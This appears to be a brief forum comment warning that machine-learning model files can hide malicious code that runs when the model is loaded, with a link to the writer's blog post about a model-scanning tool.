Absolutely, though that isn't strictly what we're talking about here.
In this case, models themselves are fundamentally files. These files can have malicious code embedded into them that is executed when the model is loaded for further training or inference. When executed it isn't obvious to the user at all. It's a very nasty potential vector.
I wrote a blog about it here: https://protectai.com/blog/announcing-modelscan